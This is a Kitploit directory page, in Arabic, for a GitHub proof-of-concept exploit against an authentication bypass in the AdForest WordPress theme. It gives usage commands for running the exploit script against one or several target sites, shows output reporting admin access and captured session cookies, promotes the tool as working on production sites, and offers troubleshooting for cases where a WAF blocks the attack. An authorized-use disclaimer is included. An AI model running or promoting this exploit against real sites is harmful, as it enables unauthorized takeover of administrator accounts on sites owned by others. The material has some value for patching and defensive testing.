Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-1729-PoC-AdForest-WordPress-Authentication-Bypass — قالب AdForest لـ WordPress عرضة لثغرة تجاوز المصادقة في جميع الإصدارات، بما في ذلك 6.0.12. ويعود السبب إلى أن الإضافة لا تتحقق بشكل صحيح من هوية المستخدم قبل مصادقته عبر الدالة 'sb_login_user_with_otp_fun'. وهذا يتيح للمهاجمين غير المصادقين تسجيل الدخول، بما في ذلك حساب المسؤول. | Kitploit
أدوات/GitHubGitHub/ninjazan420/cve-2026-1729-poc-adforest-wordpress-authentication-bypass
المصادقة والترخيصتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubninjazan420/cve-2026-1729-poc-adforest-wordpress-authentication-bypass

CVE-2026-1729-PoC-AdForest-WordPress-Authentication-Bypass

قالب AdForest لـ WordPress عرضة لثغرة تجاوز المصادقة في جميع الإصدارات، بما في ذلك 6.0.12. ويعود السبب إلى أن الإضافة لا تتحقق بشكل صحيح من هوية المستخدم قبل مصادقته عبر الدالة 'sb_login_user_with_otp_fun'. وهذا يتيح للمهاجمين غير المصادقين تسجيل الدخول، بما في ذلك حساب المسؤول.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
3منذ 7 أشهرلم تتم المراجعة بعد

CVE-2026-1729 - AdForest WordPress تجاوز المصادقة PoC

الوصف

إثبات مفهوم بسيط لثغرة CVE-2026-1729 (PoC) - ثغرة تجاوز المصادقة في قالب AdForest لـ WordPress. من تأليف f3ds cr3w est 2oo2 blog

المزايا

  • ✅ وصول مباشر كمسؤول دون بيانات اعتماد
  • ✅ يعمل على نسخ WordPress الإنتاجية
  • ✅ لا يتطلب إعداد Docker
  • ✅ واجهة سطر أوامر بسيطة
  • ✅ استمرار الجلسة

المتطلبات

  • Python 3.6+
  • مكتبة requests

التثبيت

root@kitploit:~
pip install requests

الاستخدام

الاستخدام الأساسي

root@kitploit:~
python poc/exploit.py https://target-site.com

استهداف معرف مستخدم محدد

root@kitploit:~
python poc/exploit.py https://target-site.com --user-id 2

أمثلة

root@kitploit:~
# استغلال المسؤول الافتراضي (معرف المستخدم 1)
python poc/exploit.py https://example.com

# استغلال حساب مستخدم محدد
python poc/exploit.py https://example.com --user-id 5

# اختبار أهداف متعددة
python poc/exploit.py https://site1.com
python poc/exploit.py https://site2.com --user-id 3

المخرجات

root@kitploit:~
CVE-2026-1729 - AdForest WordPress Authentication Bypass
=======================================================
WARNING: For authorized testing only!
=======================================================
[+] Target: https://example.com
[+] Targeting user ID: 1
[+] Sending exploit to: https://example.com/wp-admin/admin-ajax.php
[+] SUCCESS! Admin access granted
[+] Admin URL: https://example.com/wp-admin/
[+] Session cookies: {'wp-settings-time-1': '1234567890', 'wordpress_logged_in_...': '...'}
[+] Logged in as: admin

🎯 Exploit completed successfully!
You now have admin access to the WordPress site.

ماذا يحدث بعد الاستغلال

  1. وصول المسؤول: تحصل على صلاحيات مسؤول كاملة على /wp-admin/
  2. استمرار الجلسة: يحافظ الاستغلال على ملفات تعريف ارتباط الجلسة
  3. معلومات المستخدم: يوضح الحساب الذي تم اختراقه
  4. وصول مباشر: يمكنك الوصول فورًا إلى لوحة تحكم WordPress

ملاحظات

  • الاستخدام القانوني: استخدم الأداة فقط على المواقع التي تملكها أو لديك إذن صريح لاختبارها
  • متطلبات الهدف: يجب أن يكون قالب AdForest مثبتًا على الموقع
  • معدل النجاح: تعمل على الإصدارات القابلة للاستغلال من قالب AdForest
  • لا حاجة للتثبيت: لا حاجة لتثبيت أي شيء على الخادم الهدف

استكشاف الأخطاء وإصلاحها

إذا فشل الاستغلال:

  1. تحقق من تثبيت قالب AdForest
  2. تحقق من أن الموقع يعمل بنظام WordPress
  3. تأكد من أن إصدار القالب قابل للاستغلال
  4. تأكد من عدم وجود جدار حماية للتطبيقات (WAF) أو إضافات أمنية تمنع الطلب
تنزيل الأداة